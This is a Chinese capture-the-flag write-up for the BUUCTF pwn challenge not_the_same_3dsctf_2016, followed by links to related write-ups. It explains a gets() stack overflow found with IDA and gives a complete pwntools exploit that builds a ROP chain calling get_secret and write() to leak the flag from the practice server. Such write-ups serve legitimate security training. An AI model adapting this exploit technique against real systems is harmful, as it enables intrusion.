not_the_same_3dsctf_2016

  • 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016
    首先checksec一下,看看32位程序

    在IDA中,发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp
    shift+F12看下,发现了flag.txt这种敏感 字符串


    找到调用的函数get_secret函数

    函数调用后,flag储存在fl4g里面,我们找到fl4g的位置

    找到可以输出的write函数

    下面我们就可以写我们的exploit了

exploit

from pwn import *
p = remote("node3.buuoj.cn",25722)
write_addr = 0x0806E270
flag_addr = 0x080ECA2D
get_secret = 0x080489A0
payload='a'* 0x2d + p32(get_secret) + p32(write_addr) + p32(0) + p32(1) + p32(flag_addr) + p32(45)
p.sendline(payload)
p.interactive()

嘻嘻,如果有帮助的话,可以点个赞哦

[BUUCTF-pwn]——not_the_same_3dsctf_2016相关推荐

  1. BUUCTF(pwn)not_the_same_3dsctf_2016

    from pwn import* p=remote('node3.buuoj.cn',29208) get_secret=0x80489a0 flag=0x80eca2d write=0x806e27 ...

  2. 持续更新 BUUCTF——PWN(一)

    文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...

  3. BUUCTF Pwn warmup

    BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...

  4. BUUCTF PWN rip1 WP

    BUUCTF   PWN   rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...

  5. buuctf pwn bjdctf_2020_babyrop

    buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...

  6. 持续更新 BUUCTF——PWN(二)

    文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...

  7. BUUCTF PWN 刷题 1-15题

    1 rip 经典栈溢出漏洞. from pwn import *p = remote('node4.buuoj.cn', 27181)payload = b'a' * 23 + p64(0x40118 ...

  8. 持续更新 BUUCTF——PWN(三)

    文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...

  9. Buuctf(pwn) picoctf_2018_rop chain 栈溢出

    32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为 ...

  10. BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc

    思路 我们没有system和'/bin/sh'地址.也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和'/bin/sh'地址.再返回main进行循环调用,第二次就可以 ...

最新文章

  1. c++new时赋初值_基于ssm的客户管理系统 - C_you_again
  2. linux python3 pip3_linux环境下安装python3以及pip3
  3. 【深度学习】小目标检测、图像分类、图像识别等开源数据集汇总
  4. JQuery-让Ajax变的更简单
  5. php api json,PHP API接口必备之输出json格式数据实例详解
  6. 设置build.gradle打包时自动加时间
  7. Java 8 新特性:Comparator.naturalOrder | 自然排序
  8. node.js 设置 淘宝 镜像
  9. 员工离职时,主管应该问相关竞业的两个问题
  10. 12个Java实践项目:练完变学神
  11. 【高并发高性能高可用之海量数据MySQL实战】-提纲目录-不断更新中...
  12. Linux tar打包命令详解
  13. python爬虫 | 鸿鹄论坛评论爬取
  14. 2019热门IT技术方向,你更中意哪个?
  15. 扩展点系列之ApplicationContextAwareProcessor普通类获取Spring Bean - 第433篇
  16. 扫地机器人的配件能自制么_米家扫地机器人,第三方配件耗材靠谱吗?
  17. drools的简单入门案例
  18. SD卡读卡程序 C语言 IO模拟,单片机SD卡读卡器仿真+源程序+电路原理图
  19. Linux系统 安装飞桨PaddleHub+LAC实现词法分析 实现加载自定义词典分词 (解决Lac服务启动报错问题、解决自定义词典空格无法分词问题)
  20. Python之进程线程

热门文章

  1. 【转】HashTable 和 HashMap的区别
  2. [基础题] 3、设计一个交通工具抽象类,提供抽象方法--驾驶
  3. windows残留软件卸载
  4. .net授权获取openid_Asp.Net Core 中IdentityServer4 授权中心之自定义授权
  5. Python之深入解析如何使用Python Kivy实现一个“乒乓球”游戏
  6. 信息学奥赛一本通(C++)在线评测系统——基础(一)C++语言——1105:数组逆序重存放
  7. 【Linux】一步一步学Linux——shopt命令(214)
  8. java 调度quartz,java quartz任务调度
  9. 进程间通信--命名管道(fifo)
  10. Codeforces 1480B. The Great Hero(阅读模拟题,注意数据范围和攻击顺序)